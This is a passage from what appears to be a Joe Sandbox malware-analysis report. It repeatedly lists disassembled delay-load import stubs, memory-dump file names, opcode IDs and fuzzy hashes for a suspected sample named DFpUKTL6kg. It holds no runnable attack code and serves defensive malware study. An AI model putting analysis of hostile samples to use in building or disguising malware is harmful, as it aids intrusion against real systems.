                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7c488de84739eb914cf54d8263e3a16464f9ca8a2dd59481703335571404f60d
                  • Instruction ID: 2947e849ffe1ae291c2960c4f4249b92a03df7cffe37b170d38e34f95ba9bfda
                  • Opcode Fuzzy Hash: 7c488de84739eb914cf54d8263e3a16464f9ca8a2dd59481703335571404f60d
                  • Instruction Fuzzy Hash: 65B012B377C506BE714861887E02E37031CE4C1B11334CA2AB509D01C0D8806C8D0D31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: aa995cc31f7f14f0a6096931069e01fd2b2f22594193974f17bb22e5ae26399e
                  • Instruction ID: e3d8f342fcdf58a8577ca94c5393f9b2eb8d655980c9afcca2f812617bbefb99
                  • Opcode Fuzzy Hash: aa995cc31f7f14f0a6096931069e01fd2b2f22594193974f17bb22e5ae26399e
                  • Instruction Fuzzy Hash: 25B012B377C406BE710C61887F02E37031CE4C1B11334C92AB509D01C0D4906C0E0D31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 127eeb4e38de084751b63c062509dc61f7bd87166cf1d2d2a9dbc442054e808c
                  • Instruction ID: 246d26ec45cd14b04fb346f8c76a163c2ac4437fd91ee26d337a5a7c9a0b6ff1
                  • Opcode Fuzzy Hash: 127eeb4e38de084751b63c062509dc61f7bd87166cf1d2d2a9dbc442054e808c
                  • Instruction Fuzzy Hash: 98B012B367C506BE710861887E02E37031CE4C2B11334C92AB90DD00C0D4806C0C0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 8bc1c101a30baca3fb35ff8bc9316528ea5e0d84523a2f67445bd95ac8702f55
                  • Instruction ID: 8733be48de08a4a3498b5f1065d612959fbdaac22fbb40d49de2fc119864cbfd
                  • Opcode Fuzzy Hash: 8bc1c101a30baca3fb35ff8bc9316528ea5e0d84523a2f67445bd95ac8702f55
                  • Instruction Fuzzy Hash: 3DB012B367D406BE710861987E02E37035DF8C1B11334C92AB509D00C0D4806C0C0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 72b92aeb8177d80c43a361281b6d65c49c599496a68d9083daa60225af9d896f
                  • Instruction ID: 27a6d37ca93719c3502c4892425ae5fa06c5e42711d94f0d75e5757f41e1e111
                  • Opcode Fuzzy Hash: 72b92aeb8177d80c43a361281b6d65c49c599496a68d9083daa60225af9d896f
                  • Instruction Fuzzy Hash: 02B012B367C406BE710861997E02E37035CE4C2B11334C92ABA09D00C0D6806C0C0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d29e5cae4dee4a31fe729a9792a582ab73998bb8a28bc20945c41a4771cdecd7
                  • Instruction ID: dadd1e8975e7a8d957dbe9bfc9f746b61b21bb41ecd0830f666eeaa608d3edf6
                  • Opcode Fuzzy Hash: d29e5cae4dee4a31fe729a9792a582ab73998bb8a28bc20945c41a4771cdecd7
                  • Instruction Fuzzy Hash: D5B012B367D406BE710861887E02E37031DE4C2B11334C92AB909D00C0D4806C0C0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d3e0280b32c3038718c1fe815efcc3619bd1c20bdef150b175b403660dd14c2f
                  • Instruction ID: 2209b5d31c04412824903f1c5ed38ac7cc1a26cff2a9c52747b5e0c0ce25d7f5
                  • Opcode Fuzzy Hash: d3e0280b32c3038718c1fe815efcc3619bd1c20bdef150b175b403660dd14c2f
                  • Instruction Fuzzy Hash: A7B012B367D506BE714862887E02E37031DE4C1B11334CA2AB509D00C0D8806C4C0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 2ec3e5325c79ce8e930de6381797d2db6934c49da509d4d58c681c6c180c7273
                  • Instruction ID: 6c7f316233fa51589f3412ffa3fd6f5da9586f9e40dcb1208ea7b5ba5494f538
                  • Opcode Fuzzy Hash: 2ec3e5325c79ce8e930de6381797d2db6934c49da509d4d58c681c6c180c7273
                  • Instruction Fuzzy Hash: 3EB012B367C406BE710C61897F02E37039CE4C1B11334C92AB509D00C0D5806C0D0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: dc9a420b24404ccf1958f0208bd1e605ff9101e868ec01e8844f91a5f8300b9e
                  • Instruction ID: 77a24a89c45ee54b3b7cf91e7355ca97512e3a8aa746a0fd2587161708f04fc8
                  • Opcode Fuzzy Hash: dc9a420b24404ccf1958f0208bd1e605ff9101e868ec01e8844f91a5f8300b9e
                  • Instruction Fuzzy Hash: 7BB012B337D106FD7108718D7E02E3A035CD0C4B21330C92BF809C40C8D5845C088931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a32504f42c8c5bbcf0220ae795b9d3948f29a2e5ab6d50628ed35e6420c3284e
                  • Instruction ID: cce4ce2c6c9f576c289837f9f4ac230f332b2c045ca28548c36db6399622a1d0
                  • Opcode Fuzzy Hash: a32504f42c8c5bbcf0220ae795b9d3948f29a2e5ab6d50628ed35e6420c3284e
                  • Instruction Fuzzy Hash: DCB092A236D006AD610861897A02A3A0268E088B11320892AB509C40C895805C098931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 8a9474d9ed77178757a0b4df275dd95baeb9732afaa5785d6259e087521ec849
                  • Instruction ID: a56e8e8e7ed939055e1ce4d0f8c59ad601678bc51381073438fccf3fb9a912f7
                  • Opcode Fuzzy Hash: 8a9474d9ed77178757a0b4df275dd95baeb9732afaa5785d6259e087521ec849
                  • Instruction Fuzzy Hash: 02B092A726900ABD610851883A06A760238E481B21321882AB909C10C4D9904C084531
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4f32b5b8e7d94bc3994afc40d8bf7a1de2a36d37c80807b0e8f8ff8f6e5e6262
                  • Instruction ID: 1fea12249f433f762a5682276dec63bdebf2c74cfc2bf8cdf1154610c2da8f96
                  • Opcode Fuzzy Hash: 4f32b5b8e7d94bc3994afc40d8bf7a1de2a36d37c80807b0e8f8ff8f6e5e6262
                  • Instruction Fuzzy Hash: C1B012A737D00BBD714C51883F07E77033CE4C1B11331C83ABA09C00C0D9904C094531
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
